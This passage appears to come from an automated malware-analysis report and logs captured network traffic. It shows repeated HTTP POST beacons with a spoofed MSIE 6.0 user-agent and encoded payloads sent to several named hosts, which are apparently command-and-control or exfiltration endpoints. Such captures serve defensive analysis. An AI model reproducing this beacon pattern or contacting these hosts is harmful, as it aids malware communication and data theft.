70 46 6d 77 41 4f 76 66 53 79 53 66 31 76 65 42 70 4e 51 2f 67 75 4d 7a 32 6d 52 36 30 48 4e 36 44 76 37 67 42 43 50 56 73 30 78 43 48 58 7a 52 74 53 6c 6b 39 67 64 62 6c 69 4c 2f 70 78 57 33 34 79 38 54 45 33 67 75 4f 53 74 4e 67 48 45 6c 63 43 52 65 61 77 4e 5a 66 6f 6e 4f 33 65 6a 39 50 46 33 2b 36 37 66 4f 63 52 56 77 61 46 79 56 6d 4a 4b 70 39 74 54 53 62 4e 46 76 56 76 63 5a 54 46 54 4e 51 52 78 74 39 2b 51 6d 77 66 44 75 32 64 62 61 37 41 65 36 79 6c 6a 68 79 68 6d 54 50 62 75 53 71 6a 68 6b 73 45 2b 74 4f 50 61 55 37 2f 47 48 67 57 44 45 63 6e 34 42 30 2b 50 6a 68 6b 32 6c 50 63 61 76 70 6d 4d 4b 78 4d 71 52 59 30 56 33 50 4b 7a 5a 6b 49 74 41 2f 6b 34 69 4a 4d 68 4d 34 4a 73 76 6f 41 43 35 62 78 4a 6b 78 30 66 67 32 38 43 4a 49 6e 2f 50 6d 73 75 70 6a 6c 36 46 39 65 62 33 63 3d Data Ascii: fQ8r8VxriZkynolqhw8sRe8avcV0YzYOUIIrnPBahD8GeD7pMfpGFdLbaNCodg1vUj0iPAJ3mgeo3khd6d7y5Qd1oRevF0gFhVfsf2QmBqo0LbtNERSY+fegzTb/cKLWSH4XE8BFEoZIBgKUavKPstkLBN9FJsKHd40GZ3a9Z/jFa25lxTFAV0K0XhGxyT7LNW4D3n4TUsYlZwQ64I3PzLZuiLnYwP/uRb6bCSVrx4BIPZ5UMYfP1MoA3LSJjTTCTA07M+YZk9da7kpGp6R2BUNIOqpFmwAOvfSySf1veBpNQ/guMz2mR60HN6Dv7gBCPVs0xCHXzRtSlk9gdbliL/pxW34y8TE3guOStNgHElcCReawNZfonO3ej9PF3+67fOcRVwaFyVmJKp9tTSbNFvVvcZTFTNQRxt9+QmwfDu2dba7Ae6yljhyhmTPbuSqjhksE+tOPaU7/GHgWDEcn4B0+Pjhk2lPcavpmMKxMqRY0V3PKzZkItA/k4iJMhM4JsvoAC5bxJkx0fg28CJIn/Pmsupjl6F9eb3c=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 39 46 76 46 2b 64 36 79 69 5a 6c 79 67 6d 69 55 4b 58 78 66 58 63 45 48 44 7a 49 65 31 6a 78 54 38 6c 42 4c 4f 2b 69 2b 37 68 70 33 63 50 76 4b 65 58 6e 64 4e 30 75 39 48 43 70 68 79 64 68 53 50 59 63 57 32 36 64 7a 4a 35 78 4b 45 64 71 56 74 62 48 53 49 2b 5a 74 4e 58 55 30 49 72 68 5a 35 72 77 76 38 73 41 6d 4e 63 51 46 61 53 53 69 78 6b 78 35 37 63 33 34 37 33 41 43 64 32 58 50 47 39 36 63 78 67 56 53 70 4d 45 4f 50 56 57 6b 53 6e 33 66 5a 35 38 30 47 50 7a 66 38 5a 79 54 79 66 39 43 65 4e 6a 63 37 58 46 2f 4f 4a 30 32 57 2f 4c 64 79 64 62 51 33 35 49 53 41 5a 79 63 68 63 45 31 75 4b 35 68 42 36 2b 63 45 4e 70 2f 4b 4e 39 31 61 70 41 4d 59 2f 59 55 44 66 77 31 66 49 50 59 4d 71 4a 61 59 53 68 58 76 39 2f 57 57 49 6a 46 70 43 4c 52 31 37 39 6e 75 56 59 6d 6e 36 46 45 74 47 50 59 73 36 4c 30 2b 76 6f 4c 38 5a 41 4c 6e 75 73 4a 54 47 62 67 51 56 44 6c 43 69 33 6c 43 4a 35 2f 46 2b 69 78 62 79 32 53 47 74 43 41 65 51 48 66 70 65 57 6a 54 6b 4d 58 47 41 78 78 38 6c 70 6c 79 59 56 69 67 36 6d 55 46 33 69 68 46 48 59 41 74 4c 51 45 42 79 45 62 45 5a 65 37 71 50 4e 45 33 36 36 64 6d 6b 6d 30 70 47 59 73 75 67 46 67 4e 6e 77 61 33 58 57 68 44 67 69 73 4a 49 4c 4c 6b 70 36 75 4e 38 71 39 41 65 77 74 69 2b 59 45 73 6e 78 2f 57 72 4a 6a 35 49 6e 61 59 4c 36 46 57 79 43 4a 61 6e 37 6a 68 44 4a 55 5a 46 72 30 42 73 70 4e 37 66 33 41 41 78 6b 54 41 4c 6c 67 58 59 54 75 63 69 67 72 4d 74 51 46 46 32 4c 67 62 31 32 59 2f 4e 43 2f 6b 43 59 59 42 47 69 42 4f 75 46 31 51 51 59 65 57 51 32 2f 30 5a 62 47 64 73 56 30 38 38 41 41 68 39 4f 36 43 31 64 43 66 33 62 61 4c 6c 37 39 55 79 70 69 50 6f 75 72 46 63 4e 2f 75 71 61 33 79 46 73 70 2b 55 42 77 58 76 4d 6d 31 4d 36 55 63 52 6f 3d Data Ascii: 9FvF+d6yiZlygmiUKXxfXcEHDzIe1jxT8lBLO+i+7hp3cPvKeXndN0u9HCphydhSPYcW26dzJ5xKEdqVtbHSI+ZtNXU0IrhZ5rwv8sAmNcQFaSSixkx57c3473ACd2XPG96cxgVSpMEOPVWkSn3fZ580GPzf8ZyTyf9CeNjc7XF/OJ02W/LdydbQ35ISAZychcE1uK5hB6+cENp/KN91apAMY/YUDfw1fIPYMqJaYShXv9/WWIjFpCLR179nuVYmn6FEtGPYs6L0+voL8ZALnusJTGbgQVDlCi3lCJ5/F+ixby2SGtCAeQHfpeWjTkMXGAxx8lplyYVig6mUF3ihFHYAtLQEByEbEZe7qPNE366dmkm0pGYsugFgNnwa3XWhDgisJILLkp6uN8q9Aewti+YEsnx/WrJj5InaYL6FWyCJan7jhDJUZFr0BspN7f3AAxkTALlgXYTucigrMtQFF2Lgb12Y/NC/kCYYBGiBOuF1QQYeWQ2/0ZbGdsV088AAh9O6C1dCf3baLl79UypiPourFcN/uqa3yFsp+UBwXvMm1M6UcRo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 66 51 38 72 38 56 78 72 69 5a 6b 79 6e 6f 6c 71 68 77 38 73 52 65 38 61 76 63 56 30 59 7a 59 4f 55 49 49 72 6e 50 42 61 68 44 38 47 65 44 37 70 4d 66 70 47 46 64 4c 62 61 4e 43 6f 64 67 31 76 55 6a 30 69 50 41 4a 33 6d 67 65 6f 33 6b 68 64 36 64 37 79 35 51 64 31 6f 52 65 76 46 30 67 46 68 56 66 73 66 32 51 6d 42 71 6f 30 4c 62 74 4e 45 52 53 59 2b 66 65 67 7a 54 62 2f 63 4b 4c 57 53 48 34 58 45 38 42 46 45 6f 5a 49 42 67 4b 55 61 76 4b 50 73 74 6b 4c 42 4e 39 46 4a 73 4b 48 64 34 30 47 5a 33 61 39 5a 2f 6a 46 61 32 35 6c 78 54 46 41 56 30 4b 30 58 68 47 78 79 54 37 4c 4e 57 34 44 33 6e 34 54 55 73 59 6c 5a 77 51 36 34 49 33 50 7a 4c 5a 75 69 4c 6e 59 77 50 2f 75 52 62 36 62 43 53 56 72 78 34 42 49 50 5a 35 55 4d 59 66 50 31 4d 6f 41 33 4c 53 4a 6a 54 54 43 54 41 30 37 4d 2b 59 5a 6b 39 64 61 37 6b 70 47 70 36 52 32 42 55 4e 49 4f 71 70 46 6d 77 41 4f 76 66 53 79 53 66 31 76 65 42 70 4e 51 2f 67 75 4d 7a 32 6d 52 36 30 48 4e 36 44 76 37 67 42 43 50 56 73 30 78 43 48 58 7a 52 74 53 6c 6b 39 67 64 62 6c 69 4c 2f 70 78 57 33 34 79 38 54 45 33 67 75 4f 53 74 4e 67 48 45 6c 63 43 52 65 61 77 4e 5a 66 6f 6e 4f 33 65 6a 39 50 46 33 2b 36 37 66 4f 63 52 56 77 61 46 79 56 6d 4a 4b 70 39 74 54 53 62 4e 46 76 56 76 63 5a 54 46 54 4e 51 52 78 74 39 2b 51 6d 77 66 44 75 32 64 62 61 37 41 65 36 79 6c 6a 68 79 68 6d 54 50 62 75 53 71 6a 68 6b 73 45 2b 74 4f 50 61 55 37 2f 47 48 67 57 44 45 63 6e 34 42 30 2b 50 6a 68 6b 32 6c 50 63 61 76 70 6d 4d 4b 78 4d 71 52 59 30 56 33 50 4b 7a 5a 6b 49 74 41 2f 6b 34 69 4a 4d 68 4d 34 4a 73 76 6f 41 43 35 62 78 4a 6b 78 30 66 67 32 38 43 4a 49 6e 2f 50 6d 73 75 70 6a 6c 36 46 39 65 62 33 63 3d Data Ascii: fQ8r8VxriZkynolqhw8sRe8avcV0YzYOUIIrnPBahD8GeD7pMfpGFdLbaNCodg1vUj0iPAJ3mgeo3khd6d7y5Qd1oRevF0gFhVfsf2QmBqo0LbtNERSY+fegzTb/cKLWSH4XE8BFEoZIBgKUavKPstkLBN9FJsKHd40GZ3a9Z/jFa25lxTFAV0K0XhGxyT7LNW4D3n4TUsYlZwQ64I3PzLZuiLnYwP/uRb6bCSVrx4BIPZ5UMYfP1MoA3LSJjTTCTA07M+YZk9da7kpGp6R2BUNIOqpFmwAOvfSySf1veBpNQ/guMz2mR60HN6Dv7gBCPVs0xCHXzRtSlk9gdbliL/pxW34y8TE3guOStNgHElcCReawNZfonO3ej9PF3+67fOcRVwaFyVmJKp9tTSbNFvVvcZTFTNQRxt9+QmwfDu2dba7Ae6yljhyhmTPbuSqjhksE+tOPaU7/GHgWDEcn4B0+Pjhk2lPcavpmMKxMqRY0V3PKzZkItA/k4iJMhM4JsvoAC5bxJkx0fg28CJIn/Pmsupjl6F9eb3c=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 4c 7a 61 45 39 43 32 48 69 5a 6c 4d 4f 79 43 51 4a 4c 36 72 42 2b 61 54 68 71 77 62 44 76 58 63 73 64 6f 64 4e 43 6f 5a 69 66 4a 7a 6f 77 74 54 32 2f 71 34 73 75 46 73 76 4f 46 43 61 76 54 55 4e 2f 70 42 79 6a 33 44 36 50 6f 74 64 6d 36 67 4f 5a 67 67 48 49 2f 43 73 79 69 79 51 2f 4d 73 4f 4a 32 47 69 38 42 5a 74 42 32 72 33 6d 38 44 52 61 48 5a 69 44 57 61 47 4a 49 61 66 30 35 2f 2f 68 39 52 32 6f 4b 47 41 36 35 2b 4b 32 77 39 56 4f 4a 32 37 65 6a 36 51 61 47 6d 64 35 51 4e 4f 45 75 4d 46 4c 4a 54 6d 74 32 68 45 68 76 67 65 2f 72 2f 48 46 63 68 6e 61 6d 30 78 36 6b 44 32 30 6d 36 58 77 75 45 68 7a 6c 30 6b 46 32 56 42 38 4a 50 47 52 38 32 49 72 39 48 79 6e 73 57 32 50 57 71 64 6b 73 56 51 56 45 30 34 68 68 77 6f 76 2f 31 70 39 43 68 47 30 67 52 57 62 46 39 49 76 59 30 65 67 68 35 67 66 32 58 52 6d 50 75 50 49 45 4b 41 66 35 72 76 6f 44 39 6a 44 79 51 77 71 71 34 4a 30 55 73 58 59 2b 68 36 78 37 50 32 62 36 70 76 52 58 46 36 4b 56 73 57 4b 68 6c 36 55 67 46 63 7a 63 36 2b 36 6d 59 4e 42 53 69 36 78 37 52 65 30 4c 36 6f 43 5a 43 59 45 4c 64 6d 63 70 68 4c 56 6f 75 45 69 78 68 42 6a 71 47 6c 64 62 71 52 45 51 4c 70 50 57 68 58 53 67 4a 64 72 47 37 7a 77 55 5a 4f 64 4a 4e 6c 4e 66 50 4f 62 44 6d 54 38 34 31 4d 6a 58 73 33 66 43 79 61 71 6c 71 67 34 49 68 47 45 5a 58 73 64 52 39 57 32 59 59 6f 33 59 48 71 72 65 42 78 5a 6e 4f 6f 51 5a 57 57 30 4e 71 64 63 79 2f 75 75 77 53 5a 30 58 31 47 65 46 52 51 78 51 72 4e 69 68 54 6f 4f 45 46 37 38 78 38 47 77 67 4c 72 78 61 6a 43 65 4a 65 32 6b 49 70 74 62 59 39 79 49 59 39 47 54 75 49 47 55 71 76 32 67 75 4f 55 45 34 36 39 4e 6b 66 4e 73 44 47 50 47 45 56 39 79 64 69 38 43 6d 52 46 50 49 65 43 34 56 69 47 32 71 5a 42 2b 63 2f 6e 4d 43 51 75 52 4c 34 34 59 68 4b 6e 32 52 69 52 41 69 79 32 72 66 32 38 43 47 6b 2b 67 61 46 Data Ascii: LzaE9C2HiZlMOyCQJL6rB+aThqwbDvXcsdodNCoZifJzowtT2/q4suFsvOFCavTUN/pByj3D6Potdm6gOZggHI/CsyiyQ/MsOJ2Gi8BZtB2r3m8DRaHZiDWaGJIaf05//h9R2oKGA65+K2w9VOJ27ej6QaGmd5QNOEuMFLJTmt2hEhvge/r/HFchnam0x6kD20m6XwuEhzl0kF2VB8JPGR82Ir9HynsW2PWqdksVQVE04hhwov/1p9ChG0gRWbF9IvY0egh5gf2XRmPuPIEKAf5rvoD9jDyQwqq4J0UsXY+h6x7P2b6pvRXF6KVsWKhl6UgFczc6+6mYNBSi6x7Re0L6oCZCYELdmcphLVouEixhBjqGldbqREQLpPWhXSgJdrG7zwUZOdJNlNfPObDmT841MjXs3fCyaqlqg4IhGEZXsdR9W2YYo3YHqreBxZnOoQZWW0Nqdcy/uuwSZ0X1GeFRQxQrNihToOEF78x8GwgLrxajCeJe2kIptbY9yIY9GTuIGUqv2guOUE469NkfNsDGPGEV9ydi8CmRFPIeC4ViG2qZB+c/nMCQuRL44YhKn2RiRAiy2rf28CGk+gaF
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 53 77 74 41 34 55 49 33 6b 5a 6d 37 64 77 4b 38 4e 51 31 46 53 73 56 5a 65 64 78 53 33 45 79 2f 6c 6f 6c 49 48 31 54 4f 59 6d 42 78 68 52 6b 64 6d 2b 32 75 59 45 38 31 48 62 39 55 77 78 2b 4a 51 4e 69 75 38 52 69 6f 4f 5a 35 35 50 69 71 76 65 64 6d 78 49 4d 70 34 32 4c 4c 2b 6c 6c 66 58 45 79 65 48 54 70 78 47 65 65 72 31 6e 2b 50 62 4a 56 62 65 6c 70 44 68 58 44 4e 64 4c 37 65 6e 44 75 30 74 66 79 6a 79 48 45 55 76 43 53 78 4f 68 39 41 43 31 41 4b 6e 72 71 35 4b 74 44 6e 6d 34 66 62 7a 6c 79 30 42 4d 75 52 42 68 36 76 6a 6f 34 34 50 4e 36 71 5a 33 4f 6a 6c 51 37 35 5a 70 58 37 4b 6a 59 43 38 74 66 72 6c 77 76 6e 73 67 45 5a 42 31 72 45 73 4c 44 31 31 63 57 4a 50 59 5a 58 47 36 32 4c 2b 44 41 74 35 36 37 78 7a 4f 38 63 61 47 6d 4d 59 61 4b 49 55 4e 65 6c 38 78 6f 5a 7a 6b 59 68 49 59 71 55 47 73 71 7a 6b 77 75 54 54 4c 2b 47 77 2f 6f 53 57 2f 6b 36 37 68 32 4e 70 49 45 72 35 6e 4f 53 71 62 6f 64 50 79 41 4f 33 74 32 56 6a 58 7a 51 77 46 4d 59 66 6d 53 72 4a 52 37 72 31 79 6d 41 54 73 2b 6b 4b 6f 2b 38 4b 46 63 50 65 65 5a 68 6c 59 53 78 65 4f 42 49 4a 44 32 34 4f 36 57 73 38 70 44 35 46 38 51 53 58 70 47 53 44 38 43 44 76 61 6f 70 7a 7a 64 46 37 36 7a 6f 59 4a 4b 65 59 39 71 48 45 54 41 61 4b 6f 43 4b 36 4a 65 57 4e 68 63 77 41 65 72 59 50 53 38 74 59 32 45 4a 56 47 54 31 69 68 53 68 43 68 5a 47 35 4c 63 57 52 70 78 51 4c 6f 41 73 5a 4c 39 6b 73 50 56 45 7a 46 41 63 46 34 38 67 57 6f 35 70 35 44 36 67 58 62 35 67 77 55 2f 76 77 6c 37 4a 6e 51 58 34 58 33 58 37 37 45 34 63 2f 39 76 77 6f 4e 67 62 41 7a 51 45 75 75 6b 44 62 44 53 63 4e 33 57 38 77 42 62 73 53 4b 4e 6d 6c 36 6b 30 4d 4a 65 52 70 6d 41 4d 77 65 4a 76 49 71 68 44 38 78 54 7a 4a 68 49 47 53 59 73 4d 4e 48 56 4a 72 53 6d 72 4b 54 4b 56 6d 67 77 31 48 58 41 3d 3d Data Ascii: SwtA4UI3kZm7dwK8NQ1FSsVZedxS3Ey/lolIH1TOYmBxhRkdm+2uYE81Hb9Uwx+JQNiu8RioOZ55PiqvedmxIMp42LL+llfXEyeHTpxGeer1n+PbJVbelpDhXDNdL7enDu0tfyjyHEUvCSxOh9AC1AKnrq5KtDnm4fbzly0BMuRBh6vjo44PN6qZ3OjlQ75ZpX7KjYC8tfrlwvnsgEZB1rEsLD11cWJPYZXG62L+DAt567xzO8caGmMYaKIUNel8xoZzkYhIYqUGsqzkwuTTL+Gw/oSW/k67h2NpIEr5nOSqbodPyAO3t2VjXzQwFMYfmSrJR7r1ymATs+kKo+8KFcPeeZhlYSxeOBIJD24O6Ws8pD5F8QSXpGSD8CDvaopzzdF76zoYJKeY9qHETAaKoCK6JeWNhcwAerYPS8tY2EJVGT1ihShChZG5LcWRpxQLoAsZL9ksPVEzFAcF48gWo5p5D6gXb5gwU/vwl7JnQX4X3X77E4c/9vwoNgbAzQEuukDbDScN3W8wBbsSKNml6k0MJeRpmAMweJvIqhD8xTzJhIGSYsMNHVJrSmrKTKVmgw1HXA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 39 46 76 46 2b 64 36 79 69 5a 6c 79 67 6d 69 55 4b 58 78 66 58 63 45 48 44 7a 49 65 31 6a 78 54 38 6c 42 4c 4f 2b 69 2b 37 68 70 33 63 50 76 4b 65 58 6e 64 4e 30 75 39 48 43 70 68 79 64 68 53 50 59 63 57 32 36 64 7a 4a 35 78 4b 45 64 71 56 74 62 48 53 49 2b 5a 74 4e 58 55 30 49 72 68 5a 35 72 77 76 38 73 41 6d 4e 63 51 46 61 53 53 69 78 6b 78 35 37 63 33 34 37 33 41 43 64 32 58 50 47 39 36 63 78 67 56 53 70 4d 45 4f 50 56 57 6b 53 6e 33 66 5a 35 38 30 47 50 7a 66 38 5a 79 54 79 66 39 43 65 4e 6a 63 37 58 46 2f 4f 4a 30 32 57 2f 4c 64 79 64 62 51 33 35 49 53 41 5a 79 63 68 63 45 31 75 4b 35 68 42 36 2b 63 45 4e 70 2f 4b 4e 39 31 61 70 41 4d 59 2f 59 55 44 66 77 31 66 49 50 59 4d 71 4a 61 59 53 68 58 76 39 2f 57 57 49 6a 46 70 43 4c 52 31 37 39 6e 75 56 59 6d 6e 36 46 45 74 47 50 59 73 36 4c 30 2b 76 6f 4c 38 5a 41 4c 6e 75 73 4a 54 47 62 67 51 56 44 6c 43 69 33 6c 43 4a 35 2f 46 2b 69 78 62 79 32 53 47 74 43 41 65 51 48 66 70 65 57 6a 54 6b 4d 58 47 41 78 78 38 6c 70 6c 79 59 56 69 67 36 6d 55 46 33 69 68 46 48 59 41 74 4c 51 45 42 79 45 62 45 5a 65 37 71 50 4e 45 33 36 36 64 6d 6b 6d 30 70 47 59 73 75 67 46 67 4e 6e 77 61 33 58 57 68 44 67 69 73 4a 49 4c 4c 6b 70 36 75 4e 38 71 39 41 65 77 74 69 2b 59 45 73 6e 78 2f 57 72 4a 6a 35 49 6e 61 59 4c 36 46 57 79 43 4a 61 6e 37 6a 68 44 4a 55 5a 46 72 30 42 73 70 4e 37 66 33 41 41 78 6b 54 41 4c 6c 67 58 59 54 75 63 69 67 72 4d 74 51 46 46 32 4c 67 62 31 32 59 2f 4e 43 2f 6b 43 59 59 42 47 69 42 4f 75 46 31 51 51 59 65 57 51 32 2f 30 5a 62 47 64 73 56 30 38 38 41 41 68 39 4f 36 43 31 64 43 66 33 62 61 4c 6c 37 39 55 79 70 69 50 6f 75 72 46 63 4e 2f 75 71 61 33 79 46 73 70 2b 55 42 77 58 76 4d 6d 31 4d 36 55 63 52 6f 3d Data Ascii: 9FvF+d6yiZlygmiUKXxfXcEHDzIe1jxT8lBLO+i+7hp3cPvKeXndN0u9HCphydhSPYcW26dzJ5xKEdqVtbHSI+ZtNXU0IrhZ5rwv8sAmNcQFaSSixkx57c3473ACd2XPG96cxgVSpMEOPVWkSn3fZ580GPzf8ZyTyf9CeNjc7XF/OJ02W/LdydbQ35ISAZychcE1uK5hB6+cENp/KN91apAMY/YUDfw1fIPYMqJaYShXv9/WWIjFpCLR179nuVYmn6FEtGPYs6L0+voL8ZALnusJTGbgQVDlCi3lCJ5/F+ixby2SGtCAeQHfpeWjTkMXGAxx8lplyYVig6mUF3ihFHYAtLQEByEbEZe7qPNE366dmkm0pGYsugFgNnwa3XWhDgisJILLkp6uN8q9Aewti+YEsnx/WrJj5InaYL6FWyCJan7jhDJUZFr0BspN7f3AAxkTALlgXYTucigrMtQFF2Lgb12Y/NC/kCYYBGiBOuF1QQYeWQ2/0ZbGdsV088AAh9O6C1dCf3baLl79UypiPourFcN/uqa3yFsp+UBwXvMm1M6UcRo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 53 77 74 41 34 55 49 33 6b 5a 6d 37 64 77 4b 38 4e 51 31 46 53 73 56 5a 65 64 78 53 33 45 79 2f 6c 6f 6c 49 48 31 54 4f 59 6d 42 78 68 52 6b 64 6d 2b 32 75 59 45 38 31 48 62 39 55 77 78 2b 4a 51 4e 69 75 38 52 69 6f 4f 5a 35 35 50 69 71 76 65 64 6d 78 49 4d 70 34 32 4c 4c 2b 6c 6c 66 58 45 79 65 48 54 70 78 47 65 65 72 31 6e 2b 50 62 4a 56 62 65 6c 70 44 68 58 44 4e 64 4c 37 65 6e 44 75 30 74 66 79 6a 79 48 45 55 76 43 53 78 4f 68 39 41 43 31 41 4b 6e 72 71 35 4b 74 44 6e 6d 34 66 62 7a 6c 79 30 42 4d 75 52 42 68 36 76 6a 6f 34 34 50 4e 36 71 5a 33 4f 6a 6c 51 37 35 5a 70 58 37 4b 6a 59 43 38 74 66 72 6c 77 76 6e 73 67 45 5a 42 31 72 45 73 4c 44 31 31 63 57 4a 50 59 5a 58 47 36 32 4c 2b 44 41 74 35 36 37 78 7a 4f 38 63 61 47 6d 4d 59 61 4b 49 55 4e 65 6c 38 78 6f 5a 7a 6b 59 68 49 59 71 55 47 73 71 7a 6b 77 75 54 54 4c 2b 47 77 2f 6f 53 57 2f 6b 36 37 68 32 4e 70 49 45 72 35 6e 4f 53 71 62 6f 64 50 79 41 4f 33 74 32 56 6a 58 7a 51 77 46 4d 59 66 6d 53 72 4a 52 37 72 31 79 6d 41 54 73 2b 6b 4b 6f 2b 38 4b 46 63 50 65 65 5a 68 6c 59 53 78 65 4f 42 49 4a 44 32 34 4f 36 57 73 38 70 44 35 46 38 51 53 58 70 47 53 44 38 43 44 76 61 6f 70 7a 7a 64 46 37 36 7a 6f 59 4a 4b 65 59 39 71 48 45 54 41 61 4b 6f 43 4b 36 4a 65 57 4e 68 63 77 41 65 72 59 50 53 38 74 59 32 45 4a 56 47 54 31 69 68 53 68 43 68 5a 47 35 4c 63 57 52 70 78 51 4c 6f 41 73 5a 4c 39 6b 73 50 56 45 7a 46 41 63 46 34 38 67 57 6f 35 70 35 44 36 67 58 62 35 67 77 55 2f 76 77 6c 37 4a 6e 51 58 34 58 33 58 37 37 45 34 63 2f 39 76 77 6f 4e 67 62 41 7a 51 45 75 75 6b 44 62 44 53 63 4e 33 57 38 77 42 62 73 53 4b 4e 6d 6c 36 6b 30 4d 4a 65 52 70 6d 41 4d 77 65 4a 76 49 71 68 44 38 78 54 7a 4a 68 49 47 53 59 73 4d 4e 48 56 4a 72 53 6d 72 4b 54 4b 56 6d 67 77 31 48 58 41 3d 3d Data Ascii: SwtA4UI3kZm7dwK8NQ1FSsVZedxS3Ey/lolIH1TOYmBxhRkdm+2uYE81Hb9Uwx+JQNiu8RioOZ55PiqvedmxIMp42LL+llfXEyeHTpxGeer1n+PbJVbelpDhXDNdL7enDu0tfyjyHEUvCSxOh9AC1AKnrq5KtDnm4fbzly0BMuRBh6vjo44PN6qZ3OjlQ75ZpX7KjYC8tfrlwvnsgEZB1rEsLD11cWJPYZXG62L+DAt567xzO8caGmMYaKIUNel8xoZzkYhIYqUGsqzkwuTTL+Gw/oSW/k67h2NpIEr5nOSqbodPyAO3t2VjXzQwFMYfmSrJR7r1ymATs+kKo+8KFcPeeZhlYSxeOBIJD24O6Ws8pD5F8QSXpGSD8CDvaopzzdF76zoYJKeY9qHETAaKoCK6JeWNhcwAerYPS8tY2EJVGT1ihShChZG5LcWRpxQLoAsZL9ksPVEzFAcF48gWo5p5D6gXb5gwU/vwl7JnQX4X3X77E4c/9vwoNgbAzQEuukDbDScN3W8wBbsSKNml6k0MJeRpmAMweJvIqhD8xTzJhIGSYsMNHVJrSmrKTKVmgw1HXA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 4c 7a 61 45 39 43 32 48 69 5a 6c 4d 4f 79 43 51 4a 4c 36 72 42 2b 61 54 68 71 77 62 44 76 58 63 73 64 6f 64 4e 43 6f 5a 69 66 4a 7a 6f 77 74 54 32 2f 71 34 73 75 46 73 76 4f 46 43 61 76 54 55 4e 2f 70 42 79 6a 33 44 36 50 6f 74 64 6d 36 67 4f 5a 67 67 48 49 2f 43 73 79 69 79 51 2f 4d 73 4f 4a 32 47 69 38 42 5a 74 42 32 72 33 6d 38 44 52 61 48 5a 69 44 57 61 47 4a 49 61 66 30 35 2f 2f 68 39 52 32 6f 4b 47 41 36 35 2b 4b 32 77 39 56 4f 4a 32 37 65 6a 36 51 61 47 6d 64 35 51 4e 4f 45 75 4d 46 4c 4a 54 6d 74 32 68 45 68 76 67 65 2f 72 2f 48 46 63 68 6e 61 6d 30 78 36 6b 44 32 30 6d 36 58 77 75 45 68 7a 6c 30 6b 46 32 56 42 38 4a 50 47 52 38 32 49 72 39 48 79 6e 73 57 32 50 57 71 64 6b 73 56 51 56 45 30 34 68 68 77 6f 76 2f 31 70 39 43 68 47 30 67 52 57 62 46 39 49 76 59 30 65 67 68 35 67 66 32 58 52 6d 50 75 50 49 45 4b 41 66 35 72 76 6f 44 39 6a 44 79 51 77 71 71 34 4a 30 55 73 58 59 2b 68 36 78 37 50 32 62 36 70 76 52 58 46 36 4b 56 73 57 4b 68 6c 36 55 67 46 63 7a 63 36 2b 36 6d 59 4e 42 53 69 36 78 37 52 65 30 4c 36 6f 43 5a 43 59 45 4c 64 6d 63 70 68 4c 56 6f 75 45 69 78 68 42 6a 71 47 6c 64 62 71 52 45 51 4c 70 50 57 68 58 53 67 4a 64 72 47 37 7a 77 55 5a 4f 64 4a 4e 6c 4e 66 50 4f 62 44 6d 54 38 34 31 4d 6a 58 73 33 66 43 79 61 71 6c 71 67 34 49 68 47 45 5a 58 73 64 52 39 57 32 59 59 6f 33 59 48 71 72 65 42 78 5a 6e 4f 6f 51 5a 57 57 30 4e 71 64 63 79 2f 75 75 77 53 5a 30 58 31 47 65 46 52 51 78 51 72 4e 69 68 54 6f 4f 45 46 37 38 78 38 47 77 67 4c 72 78 61 6a 43 65 4a 65 32 6b 49 70 74 62 59 39 79 49 59 39 47 54 75 49 47 55 71 76 32 67 75 4f 55 45 34 36 39 4e 6b 66 4e 73 44 47 50 47 45 56 39 79 64 69 38 43 6d 52 46 50 49 65 43 34 56 69 47 32 71 5a 42 2b 63 2f 6e 4d 43 51 75 52 4c 34 34 59 68 4b 6e 32 52 69 52 41 69 79 32 72 66 32 38 43 47 6b 2b 67 61 46 Data Ascii: 